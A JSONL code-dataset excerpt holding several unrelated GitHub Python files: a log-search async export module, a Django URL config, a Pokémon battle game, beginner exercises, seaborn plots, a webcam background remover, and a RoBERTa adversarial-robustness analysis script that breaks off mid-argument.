tar\n \"\"\"\n self.search_handler = search_handler\n self.sorted_fields = sorted_fields\n self.file_name = file_name\n self.tar_file_name = tar_file_name\n self.file_path = f\"{ASYNC_DIR}/{self.file_name}\"\n self.tar_file_path = f\"{ASYNC_DIR}/{self.tar_file_name}\"\n self.storage = self.init_remote_storage()\n self.notify = self.init_notify_type()\n\n def export_package(self):\n \"\"\"\n 检索结果文件打包\n \"\"\"\n if not (os.path.exists(ASYNC_DIR) and os.path.isdir(ASYNC_DIR)):\n os.makedirs(ASYNC_DIR)\n\n result = self.search_handler.pre_get_result(sorted_fields=self.sorted_fields, size=MAX_RESULT_WINDOW)\n # 判断是否成功\n if result[\"_shards\"][\"total\"] != result[\"_shards\"][\"successful\"]:\n logger.error(\"can not create async_export task, reason: {}\".format(result[\"_shards\"][\"failures\"]))\n raise PreCheckAsyncExportException()\n with open(self.file_path, \"a+\", encoding=\"utf-8\") as f:\n result_list = self.search_handler._deal_query_result(result_dict=result).get(\"origin_log_list\")\n for item in result_list:\n f.write(\"%s\\n\" % json.dumps(item, ensure_ascii=False))\n if self.search_handler.scenario_id == Scenario.ES:\n generate_result = self.search_handler.scroll_result(result)\n else:\n generate_result = self.search_handler.search_after_result(result, self.sorted_fields)\n self.write_file(f, generate_result)\n\n with tarfile.open(self.tar_file_path, \"w:gz\") as tar:\n tar.add(self.file_path, arcname=self.file_name)\n\n def export_upload(self):\n \"\"\"\n 文件上传\n \"\"\"\n self.storage.export_upload(file_path=self.tar_file_path, file_name=self.tar_file_name)\n\n def generate_download_url(self, url_path: str):\n \"\"\"\n 生成url\n \"\"\"\n return self.storage.generate_download_url(url_path=url_path, file_name=self.tar_file_name)\n\n def send_msg(\n self,\n index_set_id: int,\n async_task: AsyncTask,\n search_url_path: str,\n language: str,\n name: str = ASYNC_EXPORT_EMAIL_TEMPLATE,\n title_model: str = MsgModel.NORMAL,\n ):\n \"\"\"\n 发送邮件\n \"\"\"\n index_set_obj = LogIndexSet.objects.get(index_set_id=index_set_id)\n\n platform = settings.EMAIL_TITLE[\"en\"] if translation.get_language() == \"en\" else settings.EMAIL_TITLE[\"zh\"]\n\n title = self.notify.title(\n self.generate_title_template(title_model=title_model),\n platform=platform,\n index_set_name=index_set_obj.index_set_name,\n )\n\n content = self.notify.content(\n name=name,\n file={\n \"platform\": platform,\n \"created_at\": arrow.now().format(\"YYYY-MM-DD HH:mm:ss\"),\n \"index_set_name\": index_set_obj.index_set_name,\n \"index\": \",\".join([index[\"result_table_id\"].replace(\".\", \"_\") for index in index_set_obj.indexes]),\n \"create_by\": async_task.created_by,\n \"size\": async_task.file_size,\n \"request_param\": json.dumps(async_task.request_param),\n \"search_url\": search_url_path,\n \"download_url\": async_task.download_url,\n },\n language=language,\n )\n self.notify.send(receivers=async_task.created_by, title=title, content=content)\n\n @classmethod\n def generate_title_template(cls, title_model):\n title_template_map = {\n MsgModel.NORMAL: _(\"【{platform}】{index_set_name} 检索导出\"),\n MsgModel.ABNORMAL: _(\"【{platform}】{index_set_name} 检索导出失败\"),\n }\n return title_template_map.get(title_model, title_template_map.get(MsgModel.NORMAL))\n\n def clean_package(self):\n \"\"\"\n 清空产生的临时文件\n \"\"\"\n os.remove(self.file_path)\n os.remove(self.tar_file_path)\n\n @classmethod\n def init_remote_storage(cls):\n toggle = FeatureToggleObject.toggle(FEATURE_ASYNC_EXPORT_COMMON).feature_config\n storage_type = toggle.get(FEATURE_ASYNC_EXPORT_STORAGE_TYPE)\n storage = StorageType.get_instance(storage_type)\n if not storage_type or storage_type == RemoteStorageType.NFS.value:\n return storage(settings.EXTRACT_SAAS_STORE_DIR)\n if storage_type == RemoteStorageType.BKREPO.value:\n return storage(expired=ASYNC_EXPORT_EXPIRED)\n return storage(\n toggle.get(\"qcloud_secret_id\"),\n toggle.get(\"qcloud_secret_key\"),\n toggle.get(\"qcloud_cos_region\"),\n toggle.get(\"qcloud_cos_bucket\"),\n ASYNC_EXPORT_EXPIRED,\n )\n\n def get_file_size(self):\n \"\"\"\n 获取文件大小 单位:m,保留小数2位\n \"\"\"\n return round(os.path.getsize(self.tar_file_path) / float(1024 * 1024), 2)\n\n @classmethod\n def init_notify_type(cls):\n notify_type = FeatureToggleObject.toggle(FEATURE_ASYNC_EXPORT_COMMON).feature_config.get(\n FEATURE_ASYNC_EXPORT_NOTIFY_TYPE\n )\n\n return NotifyType.get_instance(notify_type=notify_type)()\n\n @classmethod\n def write_file(cls, f, result):\n \"\"\"\n 将对应数据写到文件中\n \"\"\"\n for res in result:\n origin_result_list = res.get(\"origin_log_list\")\n for item in origin_result_list:\n f.write(\"%s\\n\" % json.dumps(item))\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_search/tasks/async_export.py","file_name":"async_export.py","file_ext":"py","file_size_in_byte":12511,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"10034086058","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"home\"\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"subcommittees/\", views.subcommittees, name=\"subcommittees\"),\n path(\"events/\", views.events, name=\"events\"),\n path(\"about/\", views.about, name=\"about\"),\n path(\"jet-engine-proposal/\", views.proposal, name=\"proposal\"),\n]\n","repo_name":"npinkhasov/wpi-aiaa-site","sub_path":"wpiaiaasite/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19381421733","text":"def min_or_max_index(lst, find_min):\n \"\"\"(list of numbers, bool) -> tuple of (number, int)\n Return the index of the minimum or maximum and the minimum or maximum.\n Preconditions: len(lst) >= 1\n \"\"\"\n if find_min:\n return get_min(lst)\n else:\n return get_max(lst)\ndef get_max(lst):\n \"\"\"(list of numbers) -> (number,index)\n Return maximum value in list and its index\n Preconditions: len(lst) >= 1\n \"\"\"\n maximum = lst[0]\n index = 0\n for i in range(len(lst)):\n if lst[i] > maximum:\n maximum = lst[i]\n index = i\n return (maximum, index)\n\ndef get_min(lst):\n \"\"\"(list of numbers) -> (number,index)\n Return minimum value in list and its index\n Preconditions: len(lst) >= 1\n \"\"\"\n minimum = lst[0]\n index = 0\n for i in range(len(lst)):\n if lst[i] < minimum:\n minimum = lst[i]\n index = i\n return (minimum, index)\n","repo_name":"SahilTara/ITI1120","sub_path":"LABS/lab9-students/prog-ex02.py","file_name":"prog-ex02.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936624081","text":"from openpyxl import Workbook\nwb=Workbook()\nws=wb.active\nws['A1']=42\nws.append([1,2,3,4,5,6,7,8,9,10])\nimport datetime\nws['C1']=datetime.datetime.now()\nws1=wb.create_sheet(0)\nws.title=\"sai\"\nws1.sheet_properties.tabColor=\"1072BA\"\nws is wb\nfor sheet in wb:\n print(sheet.title)\nfor i in range(1,10):\n for j in range (1,101):\n wb.save(\"test.xlsx\")\n","repo_name":"sai231/python","sub_path":"samplegit.py","file_name":"samplegit.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35076312807","text":"\"\"\"\nPokemonBattleSimulator.py\n\nPlay Pokemon in Python! You can choose wether to play with Pikachu or Charmander, and your opponent will always be the other Pokemon. Now with FIRE-WATER-GRASS type pokemon and type effectivity bonuses!\n\"\"\"\nimport random\n\n#Pokemon Object Constructor\nclass Pokemon(object):\n\tdef __init__(self, name, element, health, move1, move2, move3, move4):\n\t\tself.name = name\n\t\tself.element = element\n\t\tself.health = health\n\t\tself.move1 = move1\n\t\tself.move2 = move2\n\t\tself.move3 = move3\n\t\tself.move4 = move4\n\tdef __repr__(self):\n\t\treturn \"I am a Pokemon\"\n\n#Pokemon Move Function fire-water-grass effectivity\ndef Attack(yourDamage, opponentDamage):\n\tif yourPick.element == 'water' and opponentPick.element == 'fire':\n\t\tyourTypeBonus = 2.0\n\t\topponentTypeBonus = 0.5\n\telif yourPick.element == 'fire' and opponentPick.element == 'water':\n\t\tyourTypeBonus = 0.5\n\t\topponentTypeBonus = 2.0\n\telif yourPick.element == 'grass' and opponentPick.element == 'fire':\n\t\tyourTypeBonus = 0.5\n\t\topponentTypeBonus = 2.0\n\telif yourPick.element == 'fire' and opponentPick.element == 'grass':\n\t\tyourTypeBonus = 2.0\n\t\topponentTypeBonus = 0.5\n\telif yourPick.element == 'water' and opponentPick.element == 'grass':\n\t\tyourTypeBonus = 0.5\n\t\topponentTypeBonus = 2.0\n\telif yourPick.element == 'grass' and opponentPick.element == 'water':\n\t\tyourTypeBonus = 2.0\n\t\topponentTypeBonus = 0.5\n\tyourPick.health -= yourDamage * opponentTypeBonus\n\topponentPick.health -= opponentDamage * yourTypeBonus\n\n#Creation of Pokemon\nSquirtle = Pokemon(\"Squirtle\", \"water\", 120, \"Water Gun\", \"Hydro Cannon\", \"Skull Bash\", \"Aqua Jet\")\nCharmander = Pokemon(\"Charmander\", \"fire\", 120, \"Flamethrower\", \"Skull Bash\", \"Tackle\", \"Heat Crash\")\nBulbasaur = Pokemon(\"Bulbasaur\", \"grass\", 120, \"Vine Whip\", \"Grass Knot\", \"Tackle\", \"Energy Ball\")\nPoke = [Squirtle, Charmander, Bulbasaur] #List of all Pokemon mentioned here\n\n#Explanation of Pokemon\nfor Pokemon in Poke:\n\tprint(Pokemon.name, \"is of type\", Pokemon.element + \".\", \"It has\", str(Pokemon.health) + \" health.\", \"It knows\", Pokemon.move1, \",\", Pokemon.move2, \",\", Pokemon.move3, \",and\", Pokemon.move4 + \".\", \"\\n\")\n\n#Asking User Input for which Pokemon they want to battle with\nyourSelection = int(input(\"Which Pokemon would you like to play with? Pick the corresponding number for that Pokemon\"))\nopponentSelection = random.random()\n\n#Setting a Pokemon to user\nif yourSelection == 1:\n yourPick = Poke[0] #NOTE: yourPick inherits methods of the other Poké\n if opponentSelection >= 0.5:\n \topponentPick = Poke[1]\n else:\n \topponentPick = Poke[2]\n print(\"You have picked to play with\", yourPick.name)\nelif yourSelection == 2:\n yourPick = Poke[1]\n if opponentSelection >= 0.5:\n \topponentPick = Poke[2]\n else:\n \topponentPick = Poke[0]\n print(\"You have picked to play with\", yourPick.name)\nelif yourSelection == 3:\n\tyourPick = Poke[2]\n\tif opponentSelection >= 0.5:\n\t\topponentPick = Poke[0]\n\telse:\n\t\topponentPick = Poke[1]\n\tprint(\"You have picked to play with\", yourPick.name)\nelse:\n\tprint(\"That is not a Pokemon. Try again\")\nprint(\"Your opponent is\", opponentPick.name, \"\\n\")\n\n#Game Loop\nwhile(yourPick.health >= 0 and opponentPick.health >= 0):\n print(yourPick.name, \"has\", yourPick.health, \"health left.\", opponentPick.name, \"has\", opponentPick.health, \"health left.\")\n print(yourPick.name, \"knows:\\n\", yourPick.move1, \"\\n\", yourPick.move2, \"\\n\", yourPick.move3, \"\\n\", yourPick.move4)\n yourMove = int(input(\"Type the number of the move you would like to use corresponding to the name as it appeared above. Pick '5' to switch out to a different pokemon.\\n\"))\n if(yourMove == 1):\n Attack(0, 20)\n print(yourPick.name, \"used\", yourPick.move1, \"\\n\")\n elif(yourMove == 2):\n Attack(0, 22)\n print(yourPick.name, \"used\", yourPick.move2, \"\\n\")\n elif(yourMove == 3):\n Attack(10, 30)\n print(yourPick.name, \"used\", yourPick.move3, \"\\n\")\n elif(yourMove == 4):\n Attack(4, 25)\n print(yourPick.name, \"used\", yourPick.move4, \"\\n\")\n elif(yourMove == 5):\n for Pokemon in Poke:\n print(Pokemon.name, \"is of type\", Pokemon.element + \".\", \"It has\", str(Pokemon.health) + \" health.\", \"It knows\", Pokemon.move1, \",\", Pokemon.move2, \",\", Pokemon.move3, \",and\", Pokemon.move4 + \".\", \"\\n\")\n x = int(input(\"Which pokemon would you like to play with? Pick the corressponding number:\"))\n yourPick = Poke[x - 1]\n else:\n print(\"That is not a move, try again.\")\n \n opponentMove = random.randint(1,4)\n\n if (opponentMove == 1):\n Attack(20, 0)\n print(opponentPick.name, \"used\", opponentPick.move1, \"\\n\")\n elif(opponentMove == 2):\n Attack(22, 0)\n print(opponentPick.name, \"used\", opponentPick.move2, \"\\n\")\n elif(opponentMove == 3):\n Attack(30, 10)\n print(opponentPick.name, \"used\", opponentPick.move3, \"\\n\")\n elif(opponentMove == 4):\n Attack(25, 4)\n print(opponentPick.name, \"used\", opponentPick.move4, \"\\n\")\n else:\n print(\"That is not a move\")\nif yourPick.health >= 0 and opponentPick.health <= 0:\n print(yourPick.name, \"won!\", yourPick.name, \"has\", yourPick.health, \"health points left.\")\n print(opponentPick.name, \"fainted.\")\nelse:\n print(\"Sorry, better luck next time!\", opponentPick.name, \"has\", opponentPick.health, \"health points left.\")\n print(yourPick.name, \"fainted.\")","repo_name":"wagnerfilho1995/PokemonBattleSimulator","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4654712759","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 26 21:58:38 2017\n\n@author: Friend\n\"\"\"\n\"\"\"\nПрограмма, вычисляющая ��вадрат числа.\nМожет выдавать сообщение с результатом \nразными способами по выбору.\nСообщение зависит не от ключа-цифры, а от\nколичества указаний опционального аргумента\n\"\"\"\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", \n type=int,\n help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbosity\",\n #Работа программы определяется количеством указаний\n #данного опционального аргумента\n action=\"count\", \n #Значение по умолчанию, будет присваиваться переменной\n #verbosity, если его явно не указать при вызове\n default=0,\n help=\"increase output verbosity\")\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbosity >= 2:\n print(\"the square of {} equals {}\".format(args.square, answer))\nelif args.verbosity >= 1:\n print(\"{}^2 = {}\".format(args.square, answer))\nelse:\n print(answer)\n \n\"\"\"\nДля демонстрации - запустить\npython Sqcount.py 9 -v\npython Sqcount.py 9 -vv\npython Sqcount.py 9 -vvv\npython Sqcount.py 9 - если не указали default=0, то выдаст ошибку, поскольку\n операция сравнения не может быть перенесена на значение None\n типа NoneType\n\"\"\"","repo_name":"hombit/scientific_python","sub_path":"misc/jupyter_notebooks/17.12.01/Sqcount.py","file_name":"Sqcount.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"ru","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"2801692766","text":"#palindrome \r\n\r\ndef ispalindrome(w):\r\n\r\n rev = ''.join(reversed(w))\r\n\r\n \r\n if(w == rev):\r\n return True\r\n return False\r\n\r\n# main function\r\nword=input(\"Enter the word \")\r\nckeck = ispalindrome(word)\r\n\r\nif (ckeck):\r\n print(\"Yes\")\r\nelse:\r\n print(\"No\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Ahmedhesham2232/assignment1Eth-hack","sub_path":"assignment1Eth-hack/Q3 n1.py","file_name":"Q3 n1.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39194377281","text":"import cv2\r\n#import cvzone\r\nfrom cvzone.SelfiSegmentationModule import SelfiSegmentation \r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3,648)\r\ncap.set(4,488)\r\n\r\nsegmentor = SelfiSegmentation()\r\n\r\nwhile True:\r\n sucess, img = cap.read()\r\n \r\n img_out = segmentor.removeBG(img,(125,0,125),threshold=0.8)\r\n \r\n cv2.imshow(\"image\",img)\r\n cv2.imshow(\"img_out\",img_out)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\ncap.release() \r\ncv2.destroyAllWindows()\r\n \r\n","repo_name":"DileepChakravarthy7/Background_removal","sub_path":"background_remover.py","file_name":"background_remover.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3799822647","text":"import matplotlib.pyplot as plot\r\nimport seaborn as sns\r\nimport pandas\r\n\r\ncustomerData = pandas.read_csv(\"TechElectro_Customer_Data.csv\")\r\n\r\n# Plotting a histogram of Age distribution\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.histplot(customerData['Age'], bins = 20)\r\n\r\nplot.xlabel('Age')\r\nplot.ylabel('Frequency')\r\nplot.title('Histogram of Age Distribution')\r\n\r\nplot.show()\r\n\r\n# Plotting a boxplot of Annual Income by Gender\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.boxplot(x = 'Gender', y = 'Annual Income', data = customerData)\r\n\r\nplot.xlabel('Gender')\r\nplot.ylabel('Annual Income')\r\nplot.title('Box Plot of Annual Income by Gender')\r\n\r\nplot.show()\r\n\r\n# Plotting a countplot of Marital Status\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.countplot(x = 'Marital Status', data = customerData)\r\n\r\nplot.xlabel('Marital Status')\r\nplot.ylabel('Count')\r\nplot.title('Count Plot of Marital Status Distribution')\r\n\r\nplot.show()\r\n\r\n# Plotting a scatter plot of Age & Total Purchases with hue showing the gender associated to each plot\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.scatterplot(x = 'Age', y = 'Total Purchases', data = customerData, hue = 'Gender')\r\n\r\nplot.xlabel('Age')\r\nplot.ylabel('Total Purchases')\r\nplot.title('Scatter Plot of Age & Total Purchases w/ Hue of Gender')\r\nplot.show()\r\n\r\n# Plotting a bar plot of Preferred Category distribution\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.countplot(x = 'Preferred Category', data = customerData)\r\n\r\nplot.xlabel('Preferred Category')\r\nplot.ylabel('Count')\r\nplot.title('Bar Plot of Preferred Category Distribution')\r\n\r\nplot.show()\r\n\r\n# Plotting a pairplot to visualize relationships between numerical variables\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.pairplot(customerData[['Age', 'Annual Income', 'Total Purchases']], diag_kind='kde')\r\nplot.suptitle(\"Pair Plot between Age, Annual Income & Total Purchases\", y = 1.05)\r\n\r\nplot.show()\r\n\r\n# Plotting a correlation heatmap of numerical variables\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.heatmap(customerData[['Age', 'Annual Income', 'Total Purchases']].corr(), annot = True, cmap = 'coolwarm')\r\n\r\nplot.title('Correlation Heatmap of Age, Annual Income & Total Purchases')\r\n\r\nplot.show()\r\n\r\n# Plotting a box plot of Marital Status and Annual Income w/ Hue showing the gender associated with it\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.boxplot(x = 'Marital Status', y = 'Annual Income', hue = 'Gender', data = customerData)\r\n\r\nplot.xlabel('Marital Status')\r\nplot.ylabel('Annual Income')\r\nplot.title('Annual Income by Marital Status and Gender')\r\nplot.legend(title='Gender', loc='lower right')\r\n\r\nplot.show()\r\n\r\n# Plotting a violin plot of Age distribution by Preferred Category\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.violinplot(x = 'Preferred Category', y = 'Age', data = customerData)\r\n\r\nplot.xlabel('Preferred Category')\r\nplot.ylabel('Age')\r\nplot.title('Violin Plot of Age Distribution by Preferred Category')\r\n\r\nplot.show()","repo_name":"TalhaFarook/SegmentWise","sub_path":"data-eda.py","file_name":"data-eda.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5630967622","text":"import argparse\nimport os\nfrom fairseq.models.roberta import RobertaModel\nimport torch\nfrom fairseq import tasks\nimport torch.nn.functional as F\nfrom fairseq.data import Dictionary\nfrom my_utils import visualize_input_grad\nimport pdb\nimport math\nimport numpy as np\nimport sys\n\ndef get_tokens(line, roberta, task):\n tokens = line.strip().split('\\t')\n if task == \"RTE\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"MRPC\":\n sent1, sent2 = tokens[3], tokens[4]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"CoLA\":\n sent = tokens[1]\n tokens = roberta.encode(sent)\n elif task == \"SST-2\":\n sent = tokens[1]\n tokens = roberta.encode(sent)\n elif task == \"STS-B\":\n sent1, sent2 = tokens[7], tokens[8]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"QQP\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"QNLI\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"WNLI\":\n sent1, sent2 = tokens[1], tokens[2]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"MNLI-m\":\n sent1, sent2 = tokens[-2], tokens[-1]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"MNLI-mm\":\n sent1, sent2 = tokens[-2], tokens[-1]\n tokens = roberta.encode(sent1, sent2)\n elif task == \"AX\":\n sent1, sent2 = tokens[-2], tokens[-1]\n tokens = roberta.encode(sent1, sent2)\n else:\n print(\"Task {} undefined\".format(task))\n exit()\n return tokens\n\n\ndef bytes_to_unicode():\n \"\"\"\n Returns list of utf-8 byte and a corresponding list of unicode strings.\n The reversible bpe codes work on unicode strings.\n This means you need a large # of unicode characters in your vocab if you want to avoid UNKs.\n When you're at something like a 10B token dataset you end up needing around 5K for decent coverage.\n This is a signficant percentage of your normal, say, 32K bpe vocab.\n To avoid that, we want lookup tables between utf-8 bytes and unicode strings.\n And avoids mapping to whitespace/control characters the bpe code barfs on.\n \"\"\"\n bs = list(range(ord(\"!\"), ord(\"~\")+1))+list(range(ord(\"¡\"), ord(\"¬\")+1))+list(range(ord(\"®\"), ord(\"ÿ\")+1))\n cs = bs[:]\n n = 0\n for b in range(2**8):\n if b not in bs:\n bs.append(b)\n cs.append(2**8+n)\n n += 1\n cs = [chr(n) for n in cs]\n return dict(zip(bs, cs))\n\n\ndef decode(tokens, decoder, byte_decoder):\n text = ''.join([decoder[token.item()] for token in tokens])\n text = bytearray([byte_decoder[c] for c in text]).decode('utf-8', errors='replace')\n return text\n\ndef load_dictionary(filename):\n \"\"\"Load the dictionary from the filename\n\n Args:\n filename (str): the filename\n \"\"\"\n dictionary = Dictionary.load(filename)\n dictionary.add_symbol('')\n return dictionary\n\n\ndef get_entropy(attn_mat, tokens):\n # attn_mat: batch_size x shape\n # attn_mat = attn_mat.view(attn_mat.size(0), -1)\n # batch_size x num_heads x tok_len x tok_len\n bsize, nheads, toklen, _ = attn_mat.size()\n # attn_mat = attn_mat.transpose(1,2).contiguous().view(bsize, toklen, -1) / nheads\n # weighted_likelihood = - attn_mat * torch.log(torch.clamp(attn_mat, min=1e-10))\n # mask = (tokens != 1).float().unsqueeze(2).cuda()\n # total_entropy = torch.sum(mask * weighted_likelihood)\n cls_head_attn = attn_mat[:,:,0,:].contiguous()#.view(bsize, -1) / nheads\n total_entropy = torch.sum(cls_head_attn * torch.clamp(cls_head_attn, min=1e-10)).item()\n return total_entropy\n\ndef get_loss(args, embeds, batch, roberta_hub):\n tokens = batch['net_input']['src_tokens'].cuda()\n labels = batch['target'].view(-1).cuda()\n ids = batch['id']\n if args.dset == \"STS-B\":\n logits = roberta_hub.predict_from_embed('sentence_classification_head', tokens, embeds,\n return_logits=True)\n loss = F.mse_loss(\n logits,\n labels,\n reduction=\"sum\",\n )\n prediction = logits\n else:\n logit = roberta_hub.predict_from_embed('sentence_classification_head', tokens, embeds,\n return_logits=True)\n loss = F.nll_loss(\n F.log_softmax(logit, dim=-1, dtype=torch.float32),\n labels,\n reduction=\"sum\",\n )\n\n prediction = logit.argmax(dim=1).detach()\n\n return loss, prediction\n\n\ndef run_one_trial(args, roberta_hub, t, batch, max_norm, early_stop=False):\n max_loss, this_loss = -1, 0\n satisfy_count = 0\n n_iters = 0\n tol = args.tol\n hist_len = 50\n print(\"===== Trial {}\".format(t))\n adv_lr = args.adv_lr\n # while satisfy_count < 30 and n_iters < 10000:\n running_history = [-1]\n tokens = batch['net_input']['src_tokens'].cuda()\n embeds_init = roberta_hub.model.decoder.sentence_encoder.embed_tokens(tokens.cuda()).detach().clone()\n input_mask = (batch['net_input']['src_tokens'] != 1).to(embeds_init)\n delta = torch.zeros_like(embeds_init).uniform_(-1, 1) * input_mask.unsqueeze(2)\n mag = max_norm / torch.sqrt(\n batch['net_input']['src_lengths'].to(delta) * embeds_init.size(-1))\n delta = (delta * mag.view(-1, 1, 1)).detach()\n delta.requires_grad_()\n # while satisfy_count < hist_len and n_iters < 5000:\n while satisfy_count < hist_len and n_iters < 2000:\n n_iters += 1\n loss, prediction = get_loss(args, embeds_init + delta, batch, roberta_hub)\n\n if n_iters == 1:\n print(\"Prediction at initialization: {}, label: {}\".format(prediction.item(), batch['target'].item()))\n\n delta_grad = torch.autograd.grad([loss], delta)[0]\n\n embed_grad_norm = max(torch.norm(delta_grad, p=2).item(), 1e-10)\n delta = (delta + adv_lr * delta_grad / embed_grad_norm).detach()\n if n_iters in [2000]:\n adv_lr *= 0.1\n print(\"* Adjusted LR to {}\".format(adv_lr))\n\n delta_norm = torch.norm(delta).item()\n if delta_norm > max_norm:\n delta.data = delta.data / delta_norm * max_norm\n delta.requires_grad_()\n\n this_loss = loss.item()\n\n delta_change = abs((this_loss - max_loss) / this_loss)\n\n # delta_history = np.std(running_history) / embed_grad_norm\n delta_history = np.std(running_history) / this_loss\n if len(running_history) < hist_len//2:\n running_history.append(this_loss)\n else:\n running_history = running_history[1:]\n running_history.append(this_loss)\n\n if (delta_change < tol or delta_history < tol) and delta_norm >= max_norm*0.999:\n satisfy_count += 1\n else:\n satisfy_count = 0\n\n if n_iters==1 or n_iters % 100 == 0:\n print(\"Step {}, satisfy_count: {}, loss {:.2e}, max loss {:.2e}, delta change {:.2e}, delta history {:.2e} delta norm: {:.2e}, delta grad norm: {:.2e}\".format(n_iters,\n satisfy_count,\n this_loss, max_loss,\n delta_change,\n delta_history,\n torch.norm(\n delta).item(),\n torch.norm(\n delta_grad)))\n sys.stdout.flush()\n # opt.zero_grad()\n if this_loss > max_loss:\n max_loss = this_loss\n\n torch.cuda.empty_cache()\n roberta_hub.model.zero_grad()\n if early_stop and max_loss > -math.log(0.5):\n break\n\n print(\"* Trial {}, max loss: {}\".format(t, max_loss))\n return max_loss\n\ndef get_correct_idx(batch_iter, model_path, roberta_hub):\n correct_idx_list = []\n\n\n n_corr, n_total = 0, 0\n with torch.no_grad():\n for nb, batch in enumerate(batch_iter):\n tokens = batch['net_input']['src_tokens'].cuda()\n labels = batch['target'].view(-1).cuda()\n ids = batch['id']\n\n logit = roberta_hub.predict('sentence_classification_head', tokens, return_logits=True)\n prediction = logit.argmax(dim=1)\n correct_flag = prediction.view(-1) == labels\n correct_idx_list += [id.item() for id in ids[correct_flag]]\n n_corr += torch.sum(correct_flag)\n n_total += correct_flag.size(0)\n print(\"*** Loaded model from {}, with acc {}\".format(model_path, float(n_corr)/float(n_total)))\n return correct_idx_list\n\ndef check_one_radius(radius, roberta_hub, batch, early_stop=False):\n tokens = batch['net_input']['src_tokens'].cuda()\n labels = batch['target'].view(-1).cuda()\n ids = batch['id']\n\n embeds_init = roberta_hub.model.decoder.sentence_encoder.embed_tokens(tokens.cuda()).detach().clone()\n print(\"Max norm is: {}\".format(radius))\n init_loss, init_pred = get_loss(args, embeds_init, batch, roberta_hub)\n print(\"**** Clean Loss: {}\".format(init_loss))\n # max_norm = args.max_norm\n max_loss = run_one_trial(args, roberta_hub, 0, batch, radius, early_stop=early_stop)\n return max_loss, init_loss.item()\n\n\ndef get_radiuses(single_iter, roberta_hub, resume_dict=None):\n\n epsilons = np.linspace(args.max_norm, 1e-2, args.norm_steps)\n epsilons = np.concatenate([epsilons, np.linspace(9e-3, 1e-4, args.norm_steps)])\n if resume_dict is not None:\n eps_dict = resume_dict['eps_dict']\n max_loss_dict = resume_dict['max_loss_dict']\n init_loss_dict = resume_dict['init_loss_dict']\n else:\n eps_dict = {}\n max_loss_dict, init_loss_dict = {}, {}\n for nb, batch in enumerate(single_iter):\n if batch['id'].item() in eps_dict:\n continue\n # tokens = batch['net_input']['src_tokens'].cuda()\n # embeds_init = roberta_hub.model.decoder.sentence_encoder.embed_tokens(tokens).data.detach()\n # init_loss, init_pred = get_loss(args, embeds_init, batch, roberta_hub)\n # if init_loss > -math.log(0.5):\n # pdb.set_trace()\n for epsilon in epsilons:\n if epsilon == 0:\n print(\"Sample {} does not have valid epsilon. Must be a bug! Or filter samples into clean samples first\".format(batch['id']))\n exit()\n max_loss, init_loss = check_one_radius(epsilon, roberta_hub, batch, early_stop=True)\n if max_loss <= -math.log(0.5):\n break\n else:\n print(\"Sample {}, max loss {} @ radius {}, exceeds thershold.\".format(batch['id'], max_loss, epsilon))\n eps_dict[batch['id'].item()] = epsilon\n max_loss_dict[batch['id'].item()] = max_loss\n init_loss_dict[batch['id'].item()] = init_loss\n print(\"**** Got eps for sample {}: {}, with loss {}\".format(batch['id'].item(), epsilon, max_loss))\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': max_loss_dict, \"init_loss_dict\": init_loss_dict},\n 'losses/{}-maxeps{}-res-dict-anchor-{}.pt'.format(args.dset, args.max_norm, args.suffix))\n return eps_dict, max_loss_dict, init_loss_dict\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--chk-dirs\", default=[\"analysis-models/RTE-adv-2e-2_3_5e-3-89.21-5\",\n 